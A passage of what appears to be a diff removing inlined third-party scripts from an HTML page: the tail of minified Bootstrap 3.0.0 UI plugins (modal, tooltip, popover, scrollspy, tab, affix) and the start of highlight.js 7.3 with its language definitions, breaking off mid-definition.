d=a.support.transition&&c.$element.hasClass("fade");c.$element.parent().length||c.$element.appendTo(document.body),c.$element.show(),d&&c.$element[0].offsetWidth,c.$element.addClass("in").attr("aria-hidden",!1),c.enforceFocus();var e=a.Event("shown.bs.modal",{relatedTarget:b});d?c.$element.find(".modal-dialog").one(a.support.transition.end,function(){c.$element.focus().trigger(e)}).emulateTransitionEnd(300):c.$element.focus().trigger(e)}))},b.prototype.hide=function(b){b&&b.preventDefault(),b=a.Event("hide.bs.modal"),this.$element.trigger(b),this.isShown&&!b.isDefaultPrevented()&&(this.isShown=!1,this.escape(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").attr("aria-hidden",!0).off("click.dismiss.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one(a.support.transition.end,a.proxy(this.hideModal,this)).emulateTransitionEnd(300):this.hideModal())},b.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.focus()},this))},b.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keyup.dismiss.bs.modal",a.proxy(function(a){27==a.which&&this.hide()},this)):this.isShown||this.$element.off("keyup.dismiss.bs.modal")},b.prototype.hideModal=function(){var a=this;this.$element.hide(),this.backdrop(function(){a.removeBackdrop(),a.$element.trigger("hidden.bs.modal")})},b.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},b.prototype.backdrop=function(b){var c=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var d=a.support.transition&&c;if(this.$backdrop=a('<div class="modal-backdrop '+c+'" />').appendTo(document.body),this.$element.on("click.dismiss.modal",a.proxy(function(a){a.target===a.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus.call(this.$element[0]):this.hide.call(this))},this)),d&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!b)return;d?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()}else!this.isShown&&this.$backdrop?(this.$backdrop.removeClass("in"),a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one(a.support.transition.end,b).emulateTransitionEnd(150):b()):b&&b()};var c=a.fn.modal;a.fn.modal=function(c,d){return this.each(function(){var e=a(this),f=e.data("bs.modal"),g=a.extend({},b.DEFAULTS,e.data(),"object"==typeof c&&c);f||e.data("bs.modal",f=new b(this,g)),"string"==typeof c?f[c](d):g.show&&f.show(d)})},a.fn.modal.Constructor=b,a.fn.modal.noConflict=function(){return a.fn.modal=c,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(b){var c=a(this),d=c.attr("href"),e=a(c.attr("data-target")||d&&d.replace(/.*(?=#[^\s]+$)/,"")),f=e.data("modal")?"toggle":a.extend({remote:!/#/.test(d)&&d},e.data(),c.data());b.preventDefault(),e.modal(f,this).one("hide",function(){c.is(":visible")&&c.focus()})}),a(document).on("show.bs.modal",".modal",function(){a(document.body).addClass("modal-open")}).on("hidden.bs.modal",".modal",function(){a(document.body).removeClass("modal-open")})}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.type=this.options=this.enabled=this.timeout=this.hoverState=this.$element=null,this.init("tooltip",a,b)};b.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,container:!1},b.prototype.init=function(b,c,d){this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d);for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focus",i="hover"==g?"mouseleave":"blur";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},b.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},b.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show),void 0):c.show()},b.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide),void 0):c.hide()},b.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){if(this.$element.trigger(b),b.isDefaultPrevented())return;var c=this.tip();this.setContent(),this.options.animation&&c.addClass("fade");var d="function"==typeof this.options.placement?this.options.placement.call(this,c[0],this.$element[0]):this.options.placement,e=/\s?auto?\s?/i,f=e.test(d);f&&(d=d.replace(e,"")||"top"),c.detach().css({top:0,left:0,display:"block"}).addClass(d),this.options.container?c.appendTo(this.options.container):c.insertAfter(this.$element);var g=this.getPosition(),h=c[0].offsetWidth,i=c[0].offsetHeight;if(f){var j=this.$element.parent(),k=d,l=document.documentElement.scrollTop||document.body.scrollTop,m="body"==this.options.container?window.innerWidth:j.outerWidth(),n="body"==this.options.container?window.innerHeight:j.outerHeight(),o="body"==this.options.container?0:j.offset().left;d="bottom"==d&&g.top+g.height+i-l>n?"top":"top"==d&&g.top-l-i<0?"bottom":"right"==d&&g.right+h>m?"left":"left"==d&&g.left-h<o?"right":d,c.removeClass(k).addClass(d)}var p=this.getCalculatedOffset(d,g,h,i);this.applyPlacement(p,d),this.$element.trigger("shown.bs."+this.type)}},b.prototype.applyPlacement=function(a,b){var c,d=this.tip(),e=d[0].offsetWidth,f=d[0].offsetHeight,g=parseInt(d.css("margin-top"),10),h=parseInt(d.css("margin-left"),10);isNaN(g)&&(g=0),isNaN(h)&&(h=0),a.top=a.top+g,a.left=a.left+h,d.offset(a).addClass("in");var i=d[0].offsetWidth,j=d[0].offsetHeight;if("top"==b&&j!=f&&(c=!0,a.top=a.top+f-j),/bottom|top/.test(b)){var k=0;a.left<0&&(k=-2*a.left,a.left=0,d.offset(a),i=d[0].offsetWidth,j=d[0].offsetHeight),this.replaceArrow(k-e+i,i,"left")}else this.replaceArrow(j-f,j,"top");c&&d.offset(a)},b.prototype.replaceArrow=function(a,b,c){this.arrow().css(c,a?50*(1-a/b)+"%":"")},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.options.html?"html":"text"](b),a.removeClass("fade in top bottom left right")},b.prototype.hide=function(){function b(){"in"!=c.hoverState&&d.detach()}var c=this,d=this.tip(),e=a.Event("hide.bs."+this.type);return this.$element.trigger(e),e.isDefaultPrevented()?void 0:(d.removeClass("in"),a.support.transition&&this.$tip.hasClass("fade")?d.one(a.support.transition.end,b).emulateTransitionEnd(150):b(),this.$element.trigger("hidden.bs."+this.type),this)},b.prototype.fixTitle=function(){var a=this.$element;(a.attr("title")||"string"!=typeof a.attr("data-original-title"))&&a.attr("data-original-title",a.attr("title")||"").attr("title","")},b.prototype.hasContent=function(){return this.getTitle()},b.prototype.getPosition=function(){var b=this.$element[0];return a.extend({},"function"==typeof b.getBoundingClientRect?b.getBoundingClientRect():{width:b.offsetWidth,height:b.offsetHeight},this.$element.offset())},b.prototype.getCalculatedOffset=function(a,b,c,d){return"bottom"==a?{top:b.top+b.height,left:b.left+b.width/2-c/2}:"top"==a?{top:b.top-d,left:b.left+b.width/2-c/2}:"left"==a?{top:b.top+b.height/2-d/2,left:b.left-c}:{top:b.top+b.height/2-d/2,left:b.left+b.width}},b.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},b.prototype.tip=function(){return this.$tip=this.$tip||a(this.options.template)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},b.prototype.validate=function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},b.prototype.enable=function(){this.enabled=!0},b.prototype.disable=function(){this.enabled=!1},b.prototype.toggleEnabled=function(){this.enabled=!this.enabled},b.prototype.toggle=function(b){var c=b?a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type):this;c.tip().hasClass("in")?c.leave(c):c.enter(c)},b.prototype.destroy=function(){this.hide().$element.off("."+this.type).removeData("bs."+this.type)};var c=a.fn.tooltip;a.fn.tooltip=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tooltip"),f="object"==typeof c&&c;e||d.data("bs.tooltip",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.tooltip.Constructor=b,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=c,this}}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");b.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),b.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),b.prototype.constructor=b,b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content")[this.options.html?"html":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},b.prototype.hasContent=function(){return this.getTitle()||this.getContent()},b.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")},b.prototype.tip=function(){return this.$tip||(this.$tip=a(this.options.template)),this.$tip};var c=a.fn.popover;a.fn.popover=function(c){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof c&&c;e||d.data("bs.popover",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.popover.Constructor=b,a.fn.popover.noConflict=function(){return a.fn.popover=c,this}}(window.jQuery),+function(a){"use strict";function b(c,d){var e,f=a.proxy(this.process,this);this.$element=a(c).is("body")?a(window):a(c),this.$body=a("body"),this.$scrollElement=this.$element.on("scroll.bs.scroll-spy.data-api",f),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||(e=a(c).attr("href"))&&e.replace(/.*(?=#[^\s]+$)/,"")||"")+" .nav li > a",this.offsets=a([]),this.targets=a([]),this.activeTarget=null,this.refresh(),this.process()}b.DEFAULTS={offset:10},b.prototype.refresh=function(){var b=this.$element[0]==window?"offset":"position";this.offsets=a([]),this.targets=a([]);var c=this;this.$body.find(this.selector).map(function(){var d=a(this),e=d.data("target")||d.attr("href"),f=/^#\w/.test(e)&&a(e);return f&&f.length&&[[f[b]().top+(!a.isWindow(c.$scrollElement.get(0))&&c.$scrollElement.scrollTop()),e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){c.offsets.push(this[0]),c.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.$scrollElement[0].scrollHeight||this.$body[0].scrollHeight,d=c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(b>=d)return g!=(a=f.last()[0])&&this.activate(a);for(a=e.length;a--;)g!=f[a]&&b>=e[a]&&(!e[a+1]||b<=e[a+1])&&this.activate(f[a])},b.prototype.activate=function(b){this.activeTarget=b,a(this.selector).parents(".active").removeClass("active");var c=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',d=a(c).parents("li").addClass("active");d.parent(".dropdown-menu").length&&(d=d.closest("li.dropdown").addClass("active")),d.trigger("activate")};var c=a.fn.scrollspy;a.fn.scrollspy=function(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.scrollspy.Constructor=b,a.fn.scrollspy.noConflict=function(){return a.fn.scrollspy=c,this},a(window).on("load",function(){a('[data-spy="scroll"]').each(function(){var b=a(this);b.scrollspy(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(b){this.element=a(b)};b.prototype.show=function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.attr("data-target");if(d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),!b.parent("li").hasClass("active")){var e=c.find(".active:last a")[0],f=a.Event("show.bs.tab",{relatedTarget:e});if(b.trigger(f),!f.isDefaultPrevented()){var g=a(d);this.activate(b.parent("li"),c),this.activate(g,g.parent(),function(){b.trigger({type:"shown.bs.tab",relatedTarget:e})})}}},b.prototype.activate=function(b,c,d){function e(){f.removeClass("active").find("> .dropdown-menu > .active").removeClass("active"),b.addClass("active"),g?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu")&&b.closest("li.dropdown").addClass("active"),d&&d()}var f=c.find("> .active"),g=d&&a.support.transition&&f.hasClass("fade");g?f.one(a.support.transition.end,e).emulateTransitionEnd(150):e(),f.removeClass("in")};var c=a.fn.tab;a.fn.tab=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tab");e||d.data("bs.tab",e=new b(this)),"string"==typeof c&&e[c]()})},a.fn.tab.Constructor=b,a.fn.tab.noConflict=function(){return a.fn.tab=c,this},a(document).on("click.bs.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"]',function(b){b.preventDefault(),a(this).tab("show")})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.options=a.extend({},b.DEFAULTS,d),this.$window=a(window).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(c),this.affixed=this.unpin=null,this.checkPosition()};b.RESET="affix affix-top affix-bottom",b.DEFAULTS={offset:0},b.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},b.prototype.checkPosition=function(){if(this.$element.is(":visible")){var c=a(document).height(),d=this.$window.scrollTop(),e=this.$element.offset(),f=this.options.offset,g=f.top,h=f.bottom;"object"!=typeof f&&(h=g=f),"function"==typeof g&&(g=f.top()),"function"==typeof h&&(h=f.bottom());var i=null!=this.unpin&&d+this.unpin<=e.top?!1:null!=h&&e.top+this.$element.height()>=c-h?"bottom":null!=g&&g>=d?"top":!1;this.affixed!==i&&(this.unpin&&this.$element.css("top",""),this.affixed=i,this.unpin="bottom"==i?e.top-d:null,this.$element.removeClass(b.RESET).addClass("affix"+(i?"-"+i:"")),"bottom"==i&&this.$element.offset({top:document.body.offsetHeight-h-this.$element.height()}))}};var c=a.fn.affix;a.fn.affix=function(c){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof c&&c;e||d.data("bs.affix",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.affix.Constructor=b,a.fn.affix.noConflict=function(){return a.fn.affix=c,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var b=a(this),c=b.data();c.offset=c.offset||{},c.offsetBottom&&(c.offset.bottom=c.offsetBottom),c.offsetTop&&(c.offset.top=c.offsetTop),b.affix(c)})})}(window.jQuery);</script>
-<!-- END extlib/js/bootstrap-3.0.0.min.js -->
-<!-- START extlib/js/highlight-7.3.pack.min.js -->
-<script type="text/javascript">/* highlight.js Copyright (c) 2006, Ivan Sagalaev. Licensed under BSD 3-clause.
-   See https://github.com/isagalaev/highlight.js/blob/master/LICENSE */
-var hljs=new function(){function l(o){return o.replace(/&/gm,"&amp;").replace(/</gm,"&lt;").replace(/>/gm,"&gt;")}function b(p){for(var o=p.firstChild;o;o=o.nextSibling){if(o.nodeName=="CODE"){return o}if(!(o.nodeType==3&&o.nodeValue.match(/\s+/))){break}}}function h(p,o){return Array.prototype.map.call(p.childNodes,function(q){if(q.nodeType==3){return o?q.nodeValue.replace(/\n/g,""):q.nodeValue}if(q.nodeName=="BR"){return"\n"}return h(q,o)}).join("")}function a(q){var p=(q.className+" "+q.parentNode.className).split(/\s+/);p=p.map(function(r){return r.replace(/^language-/,"")});for(var o=0;o<p.length;o++){if(e[p[o]]||p[o]=="no-highlight"){return p[o]}}}function c(q){var o=[];(function p(r,s){for(var t=r.firstChild;t;t=t.nextSibling){if(t.nodeType==3){s+=t.nodeValue.length}else{if(t.nodeName=="BR"){s+=1}else{if(t.nodeType==1){o.push({event:"start",offset:s,node:t});s=p(t,s);o.push({event:"stop",offset:s,node:t})}}}}return s})(q,0);return o}function j(x,v,w){var p=0;var y="";var r=[];function t(){if(x.length&&v.length){if(x[0].offset!=v[0].offset){return(x[0].offset<v[0].offset)?x:v}else{return v[0].event=="start"?x:v}}else{return x.length?x:v}}function s(A){function z(B){return" "+B.nodeName+'="'+l(B.value)+'"'}return"<"+A.nodeName+Array.prototype.map.call(A.attributes,z).join("")+">"}while(x.length||v.length){var u=t().splice(0,1)[0];y+=l(w.substr(p,u.offset-p));p=u.offset;if(u.event=="start"){y+=s(u.node);r.push(u.node)}else{if(u.event=="stop"){var o,q=r.length;do{q--;o=r[q];y+=("</"+o.nodeName.toLowerCase()+">")}while(o!=u.node);r.splice(q,1);while(q<r.length){y+=s(r[q]);q++}}}}return y+l(w.substr(p))}function f(q){function o(s,r){return RegExp(s,"m"+(q.cI?"i":"")+(r?"g":""))}function p(y,w){if(y.compiled){return}y.compiled=true;var s=[];if(y.k){var r={};function z(A,t){t.split(" ").forEach(function(B){var C=B.split("|");r[C[0]]=[A,C[1]?Number(C[1]):1];s.push(C[0])})}y.lR=o(y.l||hljs.IR,true);if(typeof y.k=="string"){z("keyword",y.k)}else{for(var x in y.k){if(!y.k.hasOwnProperty(x)){continue}z(x,y.k[x])}}y.k=r}if(w){if(y.bWK){y.b="\\b("+s.join("|")+")\\s"}y.bR=o(y.b?y.b:"\\B|\\b");if(!y.e&&!y.eW){y.e="\\B|\\b"}if(y.e){y.eR=o(y.e)}y.tE=y.e||"";if(y.eW&&w.tE){y.tE+=(y.e?"|":"")+w.tE}}if(y.i){y.iR=o(y.i)}if(y.r===undefined){y.r=1}if(!y.c){y.c=[]}for(var v=0;v<y.c.length;v++){if(y.c[v]=="self"){y.c[v]=y}p(y.c[v],y)}if(y.starts){p(y.starts,w)}var u=[];for(var v=0;v<y.c.length;v++){u.push(y.c[v].b)}if(y.tE){u.push(y.tE)}if(y.i){u.push(y.i)}y.t=u.length?o(u.join("|"),true):{exec:function(t){return null}}}p(q)}function d(D,E){function o(r,M){for(var L=0;L<M.c.length;L++){var K=M.c[L].bR.exec(r);if(K&&K.index==0){return M.c[L]}}}function s(K,r){if(K.e&&K.eR.test(r)){return K}if(K.eW){return s(K.parent,r)}}function t(r,K){return K.i&&K.iR.test(r)}function y(L,r){var K=F.cI?r[0].toLowerCase():r[0];return L.k.hasOwnProperty(K)&&L.k[K]}function G(){var K=l(w);if(!A.k){return K}var r="";var N=0;A.lR.lastIndex=0;var L=A.lR.exec(K);while(L){r+=K.substr(N,L.index-N);var M=y(A,L);if(M){v+=M[1];r+='<span class="'+M[0]+'">'+L[0]+"</span>"}else{r+=L[0]}N=A.lR.lastIndex;L=A.lR.exec(K)}return r+K.substr(N)}function z(){if(A.sL&&!e[A.sL]){return l(w)}var r=A.sL?d(A.sL,w):g(w);if(A.r>0){v+=r.keyword_count;B+=r.r}return'<span class="'+r.language+'">'+r.value+"</span>"}function J(){return A.sL!==undefined?z():G()}function I(L,r){var K=L.cN?'<span class="'+L.cN+'">':"";if(L.rB){x+=K;w=""}else{if(L.eB){x+=l(r)+K;w=""}else{x+=K;w=r}}A=Object.create(L,{parent:{value:A}});B+=L.r}function C(K,r){w+=K;if(r===undefined){x+=J();return 0}var L=o(r,A);if(L){x+=J();I(L,r);return L.rB?0:r.length}var M=s(A,r);if(M){if(!(M.rE||M.eE)){w+=r}x+=J();do{if(A.cN){x+="</span>"}A=A.parent}while(A!=M.parent);if(M.eE){x+=l(r)}w="";if(M.starts){I(M.starts,"")}return M.rE?0:r.length}if(t(r,A)){throw"Illegal"}w+=r;return r.length||1}var F=e[D];f(F);var A=F;var w="";var B=0;var v=0;var x="";try{var u,q,p=0;while(true){A.t.lastIndex=p;u=A.t.exec(E);if(!u){break}q=C(E.substr(p,u.index-p),u[0]);p=u.index+q}C(E.substr(p));return{r:B,keyword_count:v,value:x,language:D}}catch(H){if(H=="Illegal"){return{r:0,keyword_count:0,value:l(E)}}else{throw H}}}function g(s){var o={keyword_count:0,r:0,value:l(s)};var q=o;for(var p in e){if(!e.hasOwnProperty(p)){continue}var r=d(p,s);r.language=p;if(r.keyword_count+r.r>q.keyword_count+q.r){q=r}if(r.keyword_count+r.r>o.keyword_count+o.r){q=o;o=r}}if(q.language){o.second_best=q}return o}function i(q,p,o){if(p){q=q.replace(/^((<[^>]+>|\t)+)/gm,function(r,v,u,t){return v.replace(/\t/g,p)})}if(o){q=q.replace(/\n/g,"<br>")}return q}function m(r,u,p){var v=h(r,p);var t=a(r);if(t=="no-highlight"){return}var w=t?d(t,v):g(v);t=w.language;var o=c(r);if(o.length){var q=document.createElement("pre");q.innerHTML=w.value;w.value=j(o,c(q),v)}w.value=i(w.value,u,p);var s=r.className;if(!s.match("(\\s|^)(language-)?"+t+"(\\s|$)")){s=s?(s+" "+t):t}r.innerHTML=w.value;r.className=s;r.result={language:t,kw:w.keyword_count,re:w.r};if(w.second_best){r.second_best={language:w.second_best.language,kw:w.second_best.keyword_count,re:w.second_best.r}}}function n(){if(n.called){return}n.called=true;Array.prototype.map.call(document.getElementsByTagName("pre"),b).filter(Boolean).forEach(function(o){m(o,hljs.tabReplace)})}function k(){window.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}var e={};this.LANGUAGES=e;this.highlight=d;this.highlightAuto=g;this.fixMarkup=i;this.highlightBlock=m;this.initHighlighting=n;this.initHighlightingOnLoad=k;this.IR="[a-zA-Z][a-zA-Z0-9_]*";this.UIR="[a-zA-Z_][a-zA-Z0-9_]*";this.NR="\\b\\d+(\\.\\d+)?";this.CNR="(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)";this.BNR="\\b(0b[01]+)";this.RSR="!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|\\.|-|-=|/|/=|:|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~";this.BE={b:"\\\\[\\s\\S]",r:0};this.ASM={cN:"string",b:"'",e:"'",i:"\\n",c:[this.BE],r:0};this.QSM={cN:"string",b:'"',e:'"',i:"\\n",c:[this.BE],r:0};this.CLCM={cN:"comment",b:"//",e:"$"};this.CBLCLM={cN:"comment",b:"/\\*",e:"\\*/"};this.HCM={cN:"comment",b:"#",e:"$"};this.NM={cN:"number",b:this.NR,r:0};this.CNM={cN:"number",b:this.CNR,r:0};this.BNM={cN:"number",b:this.BNR,r:0};this.inherit=function(q,r){var o={};for(var p in q){o[p]=q[p]}if(r){for(var p in r){o[p]=r[p]}}return o}}();hljs.LANGUAGES.bash=function(a){var g="true false";var e="if then else elif fi for break continue while in do done echo exit return set declare";var c={cN:"variable",b:"\\$[a-zA-Z0-9_#]+"};var b={cN:"variable",b:"\\${([^}]|\\\\})+}"};var h={cN:"string",b:'"',e:'"',i:"\\n",c:[a.BE,c,b],r:0};var d={cN:"string",b:"'",e:"'",c:[{b:"''"}],r:0};var f={cN:"test_condition",b:"",e:"",c:[h,d,c,b],k:{literal:g},r:0};return{k:{keyword:e,literal:g},c:[{cN:"shebang",b:"(#!\\/bin\\/bash)|(#!\\/bin\\/sh)",r:10},c,b,a.HCM,h,d,a.inherit(f,{b:"\\[ ",e:" \\]",r:0}),a.inherit(f,{b:"\\[\\[ ",e:" \\]\\]"})]}}(hljs);hljs.LANGUAGES.cs=function(a){return{k:"abstract as base bool break byte case catch char checked class const continue decimal default delegate do double else enum event explicit extern false finally fixed float for foreach goto if implicit in int interface internal is lock long namespace new null object operator out override params private protected public readonly ref return sbyte sealed short sizeof stackalloc static string struct switch this throw true try typeof uint ulong unchecked unsafe ushort using virtual volatile void while ascending descending from get group into join let orderby partial select set value var where yield",c:[{cN:"comment",b:"///",e:"$",rB:true,c:[{cN:"xmlDocTag",b:"///|<!--|-->"},{cN:"xmlDocTag",b:"</?",e:">"}]},a.CLCM,a.CBLCLM,{cN:"preprocessor",b:"#",e:"$",k:"if else elif endif define undef warning error line region endregion pragma checksum"},{cN:"string",b:'@"',e:'"',c:[{b:'""'}]},a.ASM,a.QSM,a.CNM]}}(hljs);hljs.LANGUAGES.ruby=function(e){var a="[a-zA-Z_][a-zA-Z0-9_]*(\\!|\\?)?";var j="[a-zA-Z_]\\w*[!?=]?|[-+~]\\@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?";var g={keyword:"and false then defined module in return redo if BEGIN retry end for true self when next until do begin unless END rescue nil else break undef not super class case require yield alias while ensure elsif or include"};var c={cN:"yardoctag",b:"@[A-Za-z]+"};var k=[{cN:"comment",b:"#",e:"$",c:[c]},{cN:"comment",b:"^\\=begin",e:"^\\=end",c:[c],r:10},{cN:"comment",b:"^__END__",e:"\\n$"}];var d={cN:"subst",b:"#\\{",e:"}",l:a,k:g};var i=[e.BE,d];var b=[{cN:"string",b:"'",e:"'",c:i,r:0},{cN:"string",b:'"',e:'"',c:i,r:0},{cN:"string",b:"%[qw]?\\(",e:"\\)",c:i},{cN:"string",b:"%[qw]?\\[",e:"\\]",c:i},{cN:"string",b:"%[qw]?{",e:"}",c:i},{cN:"string",b:"%[qw]?<",e:">",c:i,r:10},{cN:"string",b:"%[qw]?/",e:"/",c:i,r:10},{cN:"string",b:"%[qw]?%",e:"%",c:i,r:10},{cN:"string",b:"%[qw]?-",e:"-",c:i,r:10},{cN:"string",b:"%[qw]?\\|",e:"\\|",c:i,r:10}];var h={cN:"function",bWK:true,e:" |$|;",k:"def",c:[{cN:"title",b:j,l:a,k:g},{cN:"params",b:"\\(",e:"\\)",l:a,k:g}].concat(k)};var f=k.concat(b.concat([{cN:"class",bWK:true,e:"$|;",k:"class module",c:[{cN:"title",b:"[A-Za-z_]\\w*(::\\w+)*(\\?|\\!)?",r:0},{cN:"inheritance",b:"<\\s*",c:[{cN:"parent",b:"("+e.IR+"::)?"+e.IR}]}].concat(k)},h,{cN:"constant",b:"(::)?(\\b[A-Z]\\w*(::)?)+",r:0},{cN:"symbol",b:":",c:b.concat([{b:j}]),r:0},{cN:"symbol",b:a+":",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{cN:"number",b:"\\?\\w"},{cN:"variable",b:"(\\$\\W)|((\\$|\\@\\@?)(\\w+))"},{b:"("+e.RSR+")\\s*",c:k.concat([{cN:"regexp",b:"/",e:"/[a-z]*",i:"\\n",c:[e.BE,d]}]),r:0}]));d.c=f;h.c[1].c=f;return{l:a,k:g,c:f}}(hljs);hljs.LANGUAGES.javascript=function(a){return{k:{keyword:"in if for while finally var new function do return void else break catch instanceof with throw case default try this switch continue typeof delete let yield const",literal:"true false null undefined NaN Infinity"},c:[a.ASM,a.QSM,a.CLCM,a.CBLCLM,a.CNM,{b:"("+a.RSR+"|\\b(case|return|throw)\\b)\\s*",k:"return throw case",c:[a.CLCM,a.CBLCLM,{cN:"regexp",b:"/",e:"/[gim]*",i:"\\n",c:[{b:"\\\\/"}]},{b:"<",e:">;",sL:"xml"}],r:0},{cN:"function",bWK:true,e:"{",k:"function",c:[{cN:"title",b:"[A-Za-z$_][0-9A-Za-z$_]*"},{cN:"params",b:"\\(",e:"\\)",c:[a.CLCM,a.CBLCLM],i:"[\"'\\(]"}],i:"\\[|%"}]}}(hljs);hljs.LANGUAGES.xml=function(a){var c="[A-Za-z0-9\\._:-]+";var b={eW:true,c:[{cN:"attribute",b:c,r:0},{b:'="',rB:true,e:'"',c:[{cN:"value",b:'"',eW:true}]},{b:"='",rB:true,e:"'",c:[{cN:"value",b:"'",eW:true}]},{b:"=",c:[{cN:"value",b:"[^\\s/>]+"}]}]};return{cI:true,c:[{cN:"pi",b:"<\\?",e:"\\?>",r:10},{cN:"doctype",b:"<!DOCTYPE",e:">",r:10,c:[{b:"\\[",e:"\\]"}]},{cN:"comment",b:"<!--",e:"-->",r:10},{cN:"cdata",b:"<\\!\\[CDATA\\[",e:"\\]\\]>",r:10},{cN:"tag",b:"<style(?=\\s|>|$)",e:">",k:{title:"style"},c:[b],starts:{e:"</style>",rE:true,sL:"css"}},{cN:"tag",b:"<script(?=\\s|>|$)",e:">",k:{title:"script"},c:[b],starts:{e:"<\/script>",rE:true,sL:"javascript"}},{b:"",sL:"vbscript"},{cN:"tag",b:"</?",e:"/?>",c:[{cN:"title",b:"[^ 